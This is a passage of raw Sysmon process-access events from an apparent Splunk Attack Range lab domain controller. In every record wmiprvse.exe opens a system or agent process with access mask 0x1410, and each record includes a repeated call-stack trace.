9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.887{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 